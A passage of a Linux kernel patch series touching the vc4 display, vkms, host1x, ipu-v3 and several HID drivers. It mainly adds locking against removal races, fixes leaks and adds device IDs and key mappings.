+ 		/* Interrupt masking is not always honored, so check it here. */
+ 		if (status & SCALER_DISPSTAT_EUFLOW(channel) &&
+-		    control & SCALER_DISPCTRL_DSPEISLUR(channel)) {
++		    control & dspeislur) {
+ 			vc4_hvs_mask_underrun(hvs, channel);
+ 			vc4_hvs_report_underrun(dev);
+ 
+@@ -776,7 +783,7 @@ static int vc4_hvs_bind(struct device *dev, struct device *master, void *data)
+ 	struct vc4_hvs *hvs = NULL;
+ 	int ret;
+ 	u32 dispctrl;
+-	u32 reg;
++	u32 reg, top;
+ 
+ 	hvs = drmm_kzalloc(drm, sizeof(*hvs), GFP_KERNEL);
+ 	if (!hvs)
+@@ -896,22 +903,102 @@ static int vc4_hvs_bind(struct device *dev, struct device *master, void *data)
+ 		    SCALER_DISPCTRL_DISPEIRQ(1) |
+ 		    SCALER_DISPCTRL_DISPEIRQ(2);
+ 
+-	dispctrl &= ~(SCALER_DISPCTRL_DMAEIRQ |
+-		      SCALER_DISPCTRL_SLVWREIRQ |
+-		      SCALER_DISPCTRL_SLVRDEIRQ |
+-		      SCALER_DISPCTRL_DSPEIEOF(0) |
+-		      SCALER_DISPCTRL_DSPEIEOF(1) |
+-		      SCALER_DISPCTRL_DSPEIEOF(2) |
+-		      SCALER_DISPCTRL_DSPEIEOLN(0) |
+-		      SCALER_DISPCTRL_DSPEIEOLN(1) |
+-		      SCALER_DISPCTRL_DSPEIEOLN(2) |
+-		      SCALER_DISPCTRL_DSPEISLUR(0) |
+-		      SCALER_DISPCTRL_DSPEISLUR(1) |
+-		      SCALER_DISPCTRL_DSPEISLUR(2) |
+-		      SCALER_DISPCTRL_SCLEIRQ);
++	if (!vc4->is_vc5)
++		dispctrl &= ~(SCALER_DISPCTRL_DMAEIRQ |
++			      SCALER_DISPCTRL_SLVWREIRQ |
++			      SCALER_DISPCTRL_SLVRDEIRQ |
++			      SCALER_DISPCTRL_DSPEIEOF(0) |
++			      SCALER_DISPCTRL_DSPEIEOF(1) |
++			      SCALER_DISPCTRL_DSPEIEOF(2) |
++			      SCALER_DISPCTRL_DSPEIEOLN(0) |
++			      SCALER_DISPCTRL_DSPEIEOLN(1) |
++			      SCALER_DISPCTRL_DSPEIEOLN(2) |
++			      SCALER_DISPCTRL_DSPEISLUR(0) |
++			      SCALER_DISPCTRL_DSPEISLUR(1) |
++			      SCALER_DISPCTRL_DSPEISLUR(2) |
++			      SCALER_DISPCTRL_SCLEIRQ);
++	else
++		dispctrl &= ~(SCALER_DISPCTRL_DMAEIRQ |
++			      SCALER5_DISPCTRL_SLVEIRQ |
++			      SCALER5_DISPCTRL_DSPEIEOF(0) |
++			      SCALER5_DISPCTRL_DSPEIEOF(1) |
++			      SCALER5_DISPCTRL_DSPEIEOF(2) |
++			      SCALER5_DISPCTRL_DSPEIEOLN(0) |
++			      SCALER5_DISPCTRL_DSPEIEOLN(1) |
++			      SCALER5_DISPCTRL_DSPEIEOLN(2) |
++			      SCALER5_DISPCTRL_DSPEISLUR(0) |
++			      SCALER5_DISPCTRL_DSPEISLUR(1) |
++			      SCALER5_DISPCTRL_DSPEISLUR(2) |
++			      SCALER_DISPCTRL_SCLEIRQ);
++
++
++	/* Set AXI panic mode.
++	 * VC4 panics when < 2 lines in FIFO.
++	 * VC5 panics when less than 1 line in the FIFO.
++	 */
++	dispctrl &= ~(SCALER_DISPCTRL_PANIC0_MASK |
++		      SCALER_DISPCTRL_PANIC1_MASK |
++		      SCALER_DISPCTRL_PANIC2_MASK);
++	dispctrl |= VC4_SET_FIELD(2, SCALER_DISPCTRL_PANIC0);
++	dispctrl |= VC4_SET_FIELD(2, SCALER_DISPCTRL_PANIC1);
++	dispctrl |= VC4_SET_FIELD(2, SCALER_DISPCTRL_PANIC2);
+ 
+ 	HVS_WRITE(SCALER_DISPCTRL, dispctrl);
+ 
++	/* Recompute Composite Output Buffer (COB) allocations for the displays
++	 */
++	if (!vc4->is_vc5) {
++		/* The COB is 20736 pixels, or just over 10 lines at 2048 wide.
++		 * The bottom 2048 pixels are full 32bpp RGBA (intended for the
++		 * TXP composing RGBA to memory), whilst the remainder are only
++		 * 24bpp RGB.
++		 *
++		 * Assign 3 lines to channels 1 & 2, and just over 4 lines to
++		 * channel 0.
++		 */
++		#define VC4_COB_SIZE		20736
++		#define VC4_COB_LINE_WIDTH	2048
++		#define VC4_COB_NUM_LINES	3
++		reg = 0;
++		top = VC4_COB_LINE_WIDTH * VC4_COB_NUM_LINES;
++		reg |= (top - 1) << 16;
++		HVS_WRITE(SCALER_DISPBASE2, reg);
++		reg = top;
++		top += VC4_COB_LINE_WIDTH * VC4_COB_NUM_LINES;
++		reg |= (top - 1) << 16;
++		HVS_WRITE(SCALER_DISPBASE1, reg);
++		reg = top;
++		top = VC4_COB_SIZE;
++		reg |= (top - 1) << 16;
++		HVS_WRITE(SCALER_DISPBASE0, reg);
++	} else {
++		/* The COB is 44416 pixels, or 10.8 lines at 4096 wide.
++		 * The bottom 4096 pixels are full RGBA (intended for the TXP
++		 * composing RGBA to memory), whilst the remainder are only
++		 * RGB. Addressing is always pixel wide.
++		 *
++		 * Assign 3 lines of 4096 to channels 1 & 2, and just over 4
++		 * lines. to channel 0.
++		 */
++		#define VC5_COB_SIZE		44416
++		#define VC5_COB_LINE_WIDTH	4096
++		#define VC5_COB_NUM_LINES	3
++		reg = 0;
++		top = VC5_COB_LINE_WIDTH * VC5_COB_NUM_LINES;
++		reg |= top << 16;
++		HVS_WRITE(SCALER_DISPBASE2, reg);
++		top += 16;
++		reg = top;
++		top += VC5_COB_LINE_WIDTH * VC5_COB_NUM_LINES;
++		reg |= top << 16;
++		HVS_WRITE(SCALER_DISPBASE1, reg);
++		top += 16;
++		reg = top;
++		top = VC5_COB_SIZE;
++		reg |= top << 16;
++		HVS_WRITE(SCALER_DISPBASE0, reg);
++	}
++
+ 	ret = devm_request_irq(dev, platform_get_irq(pdev, 0),
+ 			       vc4_hvs_irq_handler, 0, "vc4 hvs", drm);
+ 	if (ret)
+diff --git a/drivers/gpu/drm/vc4/vc4_plane.c b/drivers/gpu/drm/vc4/vc4_plane.c
+index bd5acc4a86876..eb08020154f30 100644
+--- a/drivers/gpu/drm/vc4/vc4_plane.c
++++ b/drivers/gpu/drm/vc4/vc4_plane.c
+@@ -75,11 +75,13 @@ static const struct hvs_format {
+ 		.drm = DRM_FORMAT_ARGB1555,
+ 		.hvs = HVS_PIXEL_FORMAT_RGBA5551,
+ 		.pixel_order = HVS_PIXEL_ORDER_ABGR,
++		.pixel_order_hvs5 = HVS_PIXEL_ORDER_ARGB,
+ 	},
+ 	{
+ 		.drm = DRM_FORMAT_XRGB1555,
+ 		.hvs = HVS_PIXEL_FORMAT_RGBA5551,
+ 		.pixel_order = HVS_PIXEL_ORDER_ABGR,
++		.pixel_order_hvs5 = HVS_PIXEL_ORDER_ARGB,
+ 	},
+ 	{
+ 		.drm = DRM_FORMAT_RGB888,
+diff --git a/drivers/gpu/drm/vc4/vc4_regs.h b/drivers/gpu/drm/vc4/vc4_regs.h
+index f0290fad991de..1256f0877ff66 100644
+--- a/drivers/gpu/drm/vc4/vc4_regs.h
++++ b/drivers/gpu/drm/vc4/vc4_regs.h
+@@ -220,6 +220,12 @@
+ #define SCALER_DISPCTRL                         0x00000000
+ /* Global register for clock gating the HVS */
+ # define SCALER_DISPCTRL_ENABLE			BIT(31)
++# define SCALER_DISPCTRL_PANIC0_MASK		VC4_MASK(25, 24)
++# define SCALER_DISPCTRL_PANIC0_SHIFT		24
++# define SCALER_DISPCTRL_PANIC1_MASK		VC4_MASK(27, 26)
++# define SCALER_DISPCTRL_PANIC1_SHIFT		26
++# define SCALER_DISPCTRL_PANIC2_MASK		VC4_MASK(29, 28)
++# define SCALER_DISPCTRL_PANIC2_SHIFT		28
+ # define SCALER_DISPCTRL_DSP3_MUX_MASK		VC4_MASK(19, 18)
+ # define SCALER_DISPCTRL_DSP3_MUX_SHIFT		18
+ 
+@@ -228,15 +234,21 @@
+  * always enabled.
+  */
+ # define SCALER_DISPCTRL_DSPEISLUR(x)		BIT(13 + (x))
++# define SCALER5_DISPCTRL_DSPEISLUR(x)		BIT(9 + ((x) * 4))
+ /* Enables Display 0 end-of-line-N contribution to
+  * SCALER_DISPSTAT_IRQDISP0
+  */
+ # define SCALER_DISPCTRL_DSPEIEOLN(x)		BIT(8 + ((x) * 2))
++# define SCALER5_DISPCTRL_DSPEIEOLN(x)		BIT(8 + ((x) * 4))
+ /* Enables Display 0 EOF contribution to SCALER_DISPSTAT_IRQDISP0 */
+ # define SCALER_DISPCTRL_DSPEIEOF(x)		BIT(7 + ((x) * 2))
++# define SCALER5_DISPCTRL_DSPEIEOF(x)		BIT(7 + ((x) * 4))
+ 
+-# define SCALER_DISPCTRL_SLVRDEIRQ		BIT(6)
+-# define SCALER_DISPCTRL_SLVWREIRQ		BIT(5)
++# define SCALER5_DISPCTRL_DSPEIVST(x)		BIT(6 + ((x) * 4))
++
++# define SCALER_DISPCTRL_SLVRDEIRQ		BIT(6)	/* HVS4 only */
++# define SCALER_DISPCTRL_SLVWREIRQ		BIT(5)	/* HVS4 only */
++# define SCALER5_DISPCTRL_SLVEIRQ		BIT(5)
+ # define SCALER_DISPCTRL_DMAEIRQ		BIT(4)
+ /* Enables interrupt generation on the enabled EOF/EOLN/EISLUR
+  * bits and short frames..
+@@ -360,6 +372,7 @@
+ 
+ #define SCALER_DISPBKGND0                       0x00000044
+ # define SCALER_DISPBKGND_AUTOHS		BIT(31)
++# define SCALER5_DISPBKGND_BCK2BCK		BIT(31)
+ # define SCALER_DISPBKGND_INTERLACE		BIT(30)
+ # define SCALER_DISPBKGND_GAMMA			BIT(29)
+ # define SCALER_DISPBKGND_TESTMODE_MASK		VC4_MASK(28, 25)
+diff --git a/drivers/gpu/drm/vkms/vkms_drv.c b/drivers/gpu/drm/vkms/vkms_drv.c
+index 293dbca50c316..69346906ec813 100644
+--- a/drivers/gpu/drm/vkms/vkms_drv.c
++++ b/drivers/gpu/drm/vkms/vkms_drv.c
+@@ -57,7 +57,8 @@ static void vkms_release(struct drm_device *dev)
+ {
+ 	struct vkms_device *vkms = drm_device_to_vkms_device(dev);
+ 
+-	destroy_workqueue(vkms->output.composer_workq);
++	if (vkms->output.composer_workq)
++		destroy_workqueue(vkms->output.composer_workq);
+ }
+ 
+ static void vkms_atomic_commit_tail(struct drm_atomic_state *old_state)
+@@ -218,6 +219,7 @@ out_unregister:
+ 
+ static int __init vkms_init(void)
+ {
++	int ret;
+ 	struct vkms_config *config;
+ 
+ 	config = kmalloc(sizeof(*config), GFP_KERNEL);
+@@ -230,7 +232,11 @@ static int __init vkms_init(void)
+ 	config->writeback = enable_writeback;
+ 	config->overlay = enable_overlay;
+ 
+-	return vkms_create(config);
++	ret = vkms_create(config);
++	if (ret)
++		kfree(config);
++
++	return ret;
+ }
+ 
+ static void vkms_destroy(struct vkms_config *config)
+diff --git a/drivers/gpu/host1x/hw/hw_host1x06_uclass.h b/drivers/gpu/host1x/hw/hw_host1x06_uclass.h
+index 5f831438d19bb..50c32de452fb1 100644
+--- a/drivers/gpu/host1x/hw/hw_host1x06_uclass.h
++++ b/drivers/gpu/host1x/hw/hw_host1x06_uclass.h
+@@ -53,7 +53,7 @@ static inline u32 host1x_uclass_incr_syncpt_cond_f(u32 v)
+ 	host1x_uclass_incr_syncpt_cond_f(v)
+ static inline u32 host1x_uclass_incr_syncpt_indx_f(u32 v)
+ {
+-	return (v & 0xff) << 0;
++	return (v & 0x3ff) << 0;
+ }
+ #define HOST1X_UCLASS_INCR_SYNCPT_INDX_F(v) \
+ 	host1x_uclass_incr_syncpt_indx_f(v)
+diff --git a/drivers/gpu/host1x/hw/hw_host1x07_uclass.h b/drivers/gpu/host1x/hw/hw_host1x07_uclass.h
+index 8cd2ef087d5d0..887b878f92f79 100644
+--- a/drivers/gpu/host1x/hw/hw_host1x07_uclass.h
++++ b/drivers/gpu/host1x/hw/hw_host1x07_uclass.h
+@@ -53,7 +53,7 @@ static inline u32 host1x_uclass_incr_syncpt_cond_f(u32 v)
+ 	host1x_uclass_incr_syncpt_cond_f(v)
+ static inline u32 host1x_uclass_incr_syncpt_indx_f(u32 v)
+ {
+-	return (v & 0xff) << 0;
++	return (v & 0x3ff) << 0;
+ }
+ #define HOST1X_UCLASS_INCR_SYNCPT_INDX_F(v) \
+ 	host1x_uclass_incr_syncpt_indx_f(v)
+diff --git a/drivers/gpu/host1x/hw/hw_host1x08_uclass.h b/drivers/gpu/host1x/hw/hw_host1x08_uclass.h
+index 724cccd71aa1a..4fb1d090edae5 100644
+--- a/drivers/gpu/host1x/hw/hw_host1x08_uclass.h
++++ b/drivers/gpu/host1x/hw/hw_host1x08_uclass.h
+@@ -53,7 +53,7 @@ static inline u32 host1x_uclass_incr_syncpt_cond_f(u32 v)
+ 	host1x_uclass_incr_syncpt_cond_f(v)
+ static inline u32 host1x_uclass_incr_syncpt_indx_f(u32 v)
+ {
+-	return (v & 0xff) << 0;
++	return (v & 0x3ff) << 0;
+ }
+ #define HOST1X_UCLASS_INCR_SYNCPT_INDX_F(v) \
+ 	host1x_uclass_incr_syncpt_indx_f(v)
+diff --git a/drivers/gpu/host1x/hw/syncpt_hw.c b/drivers/gpu/host1x/hw/syncpt_hw.c
+index dd39d67ccec36..8cf35b2eff3db 100644
+--- a/drivers/gpu/host1x/hw/syncpt_hw.c
++++ b/drivers/gpu/host1x/hw/syncpt_hw.c
+@@ -106,9 +106,6 @@ static void syncpt_assign_to_channel(struct host1x_syncpt *sp,
+ #if HOST1X_HW >= 6
+ 	struct host1x *host = sp->host;
+ 
+-	if (!host->hv_regs)
+-		return;
+-
+ 	host1x_sync_writel(host,
+ 			   HOST1X_SYNC_SYNCPT_CH_APP_CH(ch ? ch->id : 0xff),
+ 			   HOST1X_SYNC_SYNCPT_CH_APP(sp->id));
+diff --git a/drivers/gpu/ipu-v3/ipu-common.c b/drivers/gpu/ipu-v3/ipu-common.c
+index 118318513e2d2..c35eac1116f5f 100644
+--- a/drivers/gpu/ipu-v3/ipu-common.c
++++ b/drivers/gpu/ipu-v3/ipu-common.c
+@@ -1165,6 +1165,7 @@ static int ipu_add_client_devices(struct ipu_soc *ipu, unsigned long ipu_base)
+ 		pdev = platform_device_alloc(reg->name, id++);
+ 		if (!pdev) {
+ 			ret = -ENOMEM;
++			of_node_put(of_node);
+ 			goto err_register;
+ 		}
+ 
+diff --git a/drivers/hid/hid-asus.c b/drivers/hid/hid-asus.c
+index f99752b998f3d..d1094bb1aa429 100644
+--- a/drivers/hid/hid-asus.c
++++ b/drivers/hid/hid-asus.c
+@@ -98,6 +98,7 @@ struct asus_kbd_leds {
+ 	struct hid_device *hdev;
+ 	struct work_struct work;
+ 	unsigned int brightness;
++	spinlock_t lock;
+ 	bool removed;
+ };
+ 
+@@ -490,21 +491,42 @@ static int rog_nkey_led_init(struct hid_device *hdev)
+ 	return ret;
+ }
+ 
++static void asus_schedule_work(struct asus_kbd_leds *led)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&led->lock, flags);
++	if (!led->removed)
++		schedule_work(&led->work);
++	spin_unlock_irqrestore(&led->lock, flags);
++}
++
+ static void asus_kbd_backlight_set(struct led_classdev *led_cdev,
+ 				   enum led_brightness brightness)
+ {
+ 	struct asus_kbd_leds *led = container_of(led_cdev, struct asus_kbd_leds,
+ 						 cdev);
++	unsigned long flags;
++
++	spin_lock_irqsave(&led->lock, flags);
+ 	led->brightness = brightness;
+-	schedule_work(&led->work);
++	spin_unlock_irqrestore(&led->lock, flags);
++
++	asus_schedule_work(led);
+ }
+ 
+ static enum led_brightness asus_kbd_backlight_get(struct led_classdev *led_cdev)
+ {
+ 	struct asus_kbd_leds *led = container_of(led_cdev, struct asus_kbd_leds,
+ 						 cdev);
++	enum led_brightness brightness;
++	unsigned long flags;
++
++	spin_lock_irqsave(&led->lock, flags);
++	brightness = led->brightness;
++	spin_unlock_irqrestore(&led->lock, flags);
+ 
+-	return led->brightness;
++	return brightness;
+ }
+ 
+ static void asus_kbd_backlight_work(struct work_struct *work)
+@@ -512,11 +534,11 @@ static void asus_kbd_backlight_work(struct work_struct *work)
+ 	struct asus_kbd_leds *led = container_of(work, struct asus_kbd_leds, work);
+ 	u8 buf[] = { FEATURE_KBD_REPORT_ID, 0xba, 0xc5, 0xc4, 0x00 };
+ 	int ret;
++	unsigned long flags;
+ 
+-	if (led->removed)
+-		return;
+-
++	spin_lock_irqsave(&led->lock, flags);
+ 	buf[4] = led->brightness;
++	spin_unlock_irqrestore(&led->lock, flags);
+ 
+ 	ret = asus_kbd_set_report(led->hdev, buf, sizeof(buf));
+ 	if (ret < 0)
+@@ -584,6 +606,7 @@ static int asus_kbd_register_leds(struct hid_device *hdev)
+ 	drvdata->kbd_backlight->cdev.brightness_set = asus_kbd_backlight_set;
+ 	drvdata->kbd_backlight->cdev.brightness_get = asus_kbd_backlight_get;
+ 	INIT_WORK(&drvdata->kbd_backlight->work, asus_kbd_backlight_work);
++	spin_lock_init(&drvdata->kbd_backlight->lock);
+ 
+ 	ret = devm_led_classdev_register(&hdev->dev, &drvdata->kbd_backlight->cdev);
+ 	if (ret < 0) {
+@@ -1119,9 +1142,13 @@ err_stop_hw:
+ static void asus_remove(struct hid_device *hdev)
+ {
+ 	struct asus_drvdata *drvdata = hid_get_drvdata(hdev);
++	unsigned long flags;
+ 
+ 	if (drvdata->kbd_backlight) {
++		spin_lock_irqsave(&drvdata->kbd_backlight->lock, flags);
+ 		drvdata->kbd_backlight->removed = true;
++		spin_unlock_irqrestore(&drvdata->kbd_backlight->lock, flags);
++
+ 		cancel_work_sync(&drvdata->kbd_backlight->work);
+ 	}
+ 
+diff --git a/drivers/hid/hid-bigbenff.c b/drivers/hid/hid-bigbenff.c
+index e8b16665860d6..a02cb517b4c47 100644
+--- a/drivers/hid/hid-bigbenff.c
++++ b/drivers/hid/hid-bigbenff.c
+@@ -174,6 +174,7 @@ static __u8 pid0902_rdesc_fixed[] = {
+ struct bigben_device {
+ 	struct hid_device *hid;
+ 	struct hid_report *report;
++	spinlock_t lock;
+ 	bool removed;
+ 	u8 led_state;         /* LED1 = 1 .. LED4 = 8 */
+ 	u8 right_motor_on;    /* right motor off/on 0/1 */
+@@ -184,18 +185,39 @@ struct bigben_device {
+ 	struct work_struct worker;
+ };
+ 
++static inline void bigben_schedule_work(struct bigben_device *bigben)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&bigben->lock, flags);
++	if (!bigben->removed)
++		schedule_work(&bigben->worker);
++	spin_unlock_irqrestore(&bigben->lock, flags);
++}
+ 
+ static void bigben_worker(struct work_struct *work)
+ {
+ 	struct bigben_device *bigben = container_of(work,
+ 		struct bigben_device, worker);
+ 	struct hid_field *report_field = bigben->report->field[0];
+-
+-	if (bigben->removed || !report_field)
++	bool do_work_led = false;
++	bool do_work_ff = false;
++	u8 *buf;
++	u32 len;
++	unsigned long flags;
++
++	buf = hid_alloc_report_buf(bigben->report, GFP_KERNEL);
++	if (!buf)
+ 		return;
+ 
++	len = hid_report_len(bigben->report);
++
++	/* LED work */
++	spin_lock_irqsave(&bigben->lock, flags);
++
+ 	if (bigben->work_led) {
+ 		bigben->work_led = false;
++		do_work_led = true;
+ 		report_field->value[0] = 0x01; /* 1 = led message */
+ 		report_field->value[1] = 0x08; /* reserved value, always 8 */
+ 		report_field->value[2] = bigben->led_state;
+@@ -204,11 +226,22 @@ static void bigben_worker(struct work_struct *work)
+ 		report_field->value[5] = 0x00; /* padding */
+ 		report_field->value[6] = 0x00; /* padding */
+ 		report_field->value[7] = 0x00; /* padding */
+-		hid_hw_request(bigben->hid, bigben->report, HID_REQ_SET_REPORT);
++		hid_output_report(bigben->report, buf);
++	}
++
++	spin_unlock_irqrestore(&bigben->lock, flags);
++
++	if (do_work_led) {
++		hid_hw_raw_request(bigben->hid, bigben->report->id, buf, len,
++				   bigben->report->type, HID_REQ_SET_REPORT);
+ 	}
+ 
++	/* FF work */
++	spin_lock_irqsave(&bigben->lock, flags);
++
+ 	if (bigben->work_ff) {
+ 		bigben->work_ff = false;
++		do_work_ff = true;
+ 		report_field->value[0] = 0x02; /* 2 = rumble effect message */
+ 		report_field->value[1] = 0x08; /* reserved value, always 8 */
+ 		report_field->value[2] = bigben->right_motor_on;
+@@ -217,8 +250,17 @@ static void bigben_worker(struct work_struct *work)
+ 		report_field->value[5] = 0x00; /* padding */
+ 		report_field->value[6] = 0x00; /* padding */
+ 		report_field->value[7] = 0x00; /* padding */
+-		hid_hw_request(bigben->hid, bigben->report, HID_REQ_SET_REPORT);
++		hid_output_report(bigben->report, buf);
++	}
++
++	spin_unlock_irqrestore(&bigben->lock, flags);
++
++	if (do_work_ff) {
++		hid_hw_raw_request(bigben->hid, bigben->report->id, buf, len,
++				   bigben->report->type, HID_REQ_SET_REPORT);
+ 	}
++
++	kfree(buf);
+ }
+ 
+ static int hid_bigben_play_effect(struct input_dev *dev, void *data,
+@@ -228,6 +270,7 @@ static int hid_bigben_play_effect(struct input_dev *dev, void *data,
+ 	struct bigben_device *bigben = hid_get_drvdata(hid);
+ 	u8 right_motor_on;
+ 	u8 left_motor_force;
++	unsigned long flags;
+ 
+ 	if (!bigben) {
+ 		hid_err(hid, "no device data\n");
+@@ -242,10 +285,13 @@ static int hid_bigben_play_effect(struct input_dev *dev, void *data,
+ 
+ 	if (right_motor_on != bigben->right_motor_on ||
+ 			left_motor_force != bigben->left_motor_force) {
++		spin_lock_irqsave(&bigben->lock, flags);
+ 		bigben->right_motor_on   = right_motor_on;
+ 		bigben->left_motor_force = left_motor_force;
+ 		bigben->work_ff = true;
+-		schedule_work(&bigben->worker);
++		spin_unlock_irqrestore(&bigben->lock, flags);
++
++		bigben_schedule_work(bigben);
+ 	}
+ 
+ 	return 0;
+@@ -259,6 +305,7 @@ static void bigben_set_led(struct led_classdev *led,
+ 	struct bigben_device *bigben = hid_get_drvdata(hid);
+ 	int n;
+ 	bool work;
++	unsigned long flags;
+ 
+ 	if (!bigben) {
+ 		hid_err(hid, "no device data\n");
+@@ -267,6 +314,7 @@ static void bigben_set_led(struct led_classdev *led,
+ 
+ 	for (n = 0; n < NUM_LEDS; n++) {
+ 		if (led == bigben->leds[n]) {
++			spin_lock_irqsave(&bigben->lock, flags);
+ 			if (value == LED_OFF) {
+ 				work = (bigben->led_state & BIT(n));
+ 				bigben->led_state &= ~BIT(n);
+@@ -274,10 +322,11 @@ static void bigben_set_led(struct led_classdev *led,
+ 				work = !(bigben->led_state & BIT(n));
+ 				bigben->led_state |= BIT(n);
+ 			}
++			spin_unlock_irqrestore(&bigben->lock, flags);
+ 
+ 			if (work) {
+ 				bigben->work_led = true;
+-				schedule_work(&bigben->worker);
++				bigben_schedule_work(bigben);
+ 			}
+ 			return;
+ 		}
+@@ -307,8 +356,12 @@ static enum led_brightness bigben_get_led(struct led_classdev *led)
+ static void bigben_remove(struct hid_device *hid)
+ {
+ 	struct bigben_device *bigben = hid_get_drvdata(hid);
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&bigben->lock, flags);
+ 	bigben->removed = true;
++	spin_unlock_irqrestore(&bigben->lock, flags);
++
+ 	cancel_work_sync(&bigben->worker);
+ 	hid_hw_stop(hid);
+ }
+@@ -318,7 +371,6 @@ static int bigben_probe(struct hid_device *hid,
+ {
+ 	struct bigben_device *bigben;
+ 	struct hid_input *hidinput;
+-	struct list_head *report_list;
+ 	struct led_classdev *led;
+ 	char *name;
+ 	size_t name_sz;
+@@ -343,14 +395,12 @@ static int bigben_probe(struct hid_device *hid,
+ 		return error;
+ 	}
+ 
+-	report_list = &hid->report_enum[HID_OUTPUT_REPORT].report_list;
+-	if (list_empty(report_list)) {
++	bigben->report = hid_validate_values(hid, HID_OUTPUT_REPORT, 0, 0, 8);
++	if (!bigben->report) {
+ 		hid_err(hid, "no output report found\n");
+ 		error = -ENODEV;
+ 		goto error_hw_stop;
+ 	}
+-	bigben->report = list_entry(report_list->next,
+-		struct hid_report, list);
+ 
+ 	if (list_empty(&hid->inputs)) {
+ 		hid_err(hid, "no inputs found\n");
+@@ -362,6 +412,7 @@ static int bigben_probe(struct hid_device *hid,
+ 	set_bit(FF_RUMBLE, hidinput->input->ffbit);
+ 
+ 	INIT_WORK(&bigben->worker, bigben_worker);
++	spin_lock_init(&bigben->lock);
+ 
+ 	error = input_ff_create_memless(hidinput->input, NULL,
+ 		hid_bigben_play_effect);
+@@ -402,7 +453,7 @@ static int bigben_probe(struct hid_device *hid,
+ 	bigben->left_motor_force = 0;
+ 	bigben->work_led = true;
+ 	bigben->work_ff = true;
+-	schedule_work(&bigben->worker);
++	bigben_schedule_work(bigben);
+ 
+ 	hid_info(hid, "LED and force feedback support for BigBen gamepad\n");
+ 
+diff --git a/drivers/hid/hid-debug.c b/drivers/hid/hid-debug.c
+index e213bdde543af..e7ef1ea107c9e 100644
+--- a/drivers/hid/hid-debug.c
++++ b/drivers/hid/hid-debug.c
+@@ -975,6 +975,7 @@ static const char *keys[KEY_MAX + 1] = {
+ 	[KEY_CAMERA_ACCESS_DISABLE] = "CameraAccessDisable",
+ 	[KEY_CAMERA_ACCESS_TOGGLE] = "CameraAccessToggle",
+ 	[KEY_DICTATE] = "Dictate",
++	[KEY_MICMUTE] = "MicrophoneMute",
+ 	[KEY_BRIGHTNESS_MIN] = "BrightnessMin",
+ 	[KEY_BRIGHTNESS_MAX] = "BrightnessMax",
+ 	[KEY_BRIGHTNESS_AUTO] = "BrightnessAuto",
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 9e36b4cd905ee..2235d78784b1b 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -1299,7 +1299,9 @@
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01	0x0042
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2	0x0905
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L	0x0935
++#define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW	0x0934
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S	0x0909
++#define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW	0x0933
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_STAR06	0x0078
+ #define USB_DEVICE_ID_UGEE_TABLET_G5		0x0074
+ #define USB_DEVICE_ID_UGEE_TABLET_EX07S		0x0071
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 77c8c49852b5c..c3c7d0abb01ad 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -378,6 +378,10 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L),
+ 	  HID_BATTERY_QUIRK_AVOID_QUERY },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW),
++	  HID_BATTERY_QUIRK_AVOID_QUERY },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW),
++	  HID_BATTERY_QUIRK_AVOID_QUERY },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15T_DR100),
+@@ -793,6 +797,14 @@ static void hidinput_configure_usage(struct hid_input *hidinput, struct hid_fiel
+ 			break;
+ 		}
+ 
++		if ((usage->hid & 0xf0) == 0xa0) {	/* SystemControl */
++			switch (usage->hid & 0xf) {
++			case 0x9: map_key_clear(KEY_MICMUTE); break;
++			default: goto ignore;
++			}
++			break;
++		}
++
+ 		if ((usage->hid & 0xf0) == 0xb0) {	/* SC - Display */
+ 			switch (usage->hid & 0xf) {
+ 			case 0x05: map_key_clear(KEY_SWITCHVIDEOMODE); break;
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 9c1ee8e91e0ca..5efc591a02a03 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -77,6 +77,7 @@ MODULE_PARM_DESC(disable_tap_to_click,
+ #define HIDPP_QUIRK_HIDPP_WHEELS		BIT(26)
+ #define HIDPP_QUIRK_HIDPP_EXTRA_MOUSE_BTNS	BIT(27)
+ #define HIDPP_QUIRK_HIDPP_CONSUMER_VENDOR_KEYS	BIT(28)
++#define HIDPP_QUIRK_HI_RES_SCROLL_1P0		BIT(29)
+ 
+ /* These are just aliases for now */
+ #define HIDPP_QUIRK_KBD_SCROLL_WHEEL HIDPP_QUIRK_HIDPP_WHEELS
+@@ -3472,14 +3473,8 @@ static int hidpp_initialize_hires_scroll(struct hidpp_device *hidpp)
+ 			hid_dbg(hidpp->hid_dev, "Detected HID++ 2.0 hi-res scrolling\n");
+ 		}
+ 	} else {
+-		struct hidpp_report response;
+-
+-		ret = hidpp_send_rap_command_sync(hidpp,
+-						  REPORT_ID_HIDPP_SHORT,
+-						  HIDPP_GET_REGISTER,
+-						  HIDPP_ENABLE_FAST_SCROLL,
+-						  NULL, 0, &response);
+-		if (!ret) {
++		/* We cannot detect fast scrolling support on HID++ 1.0 devices */
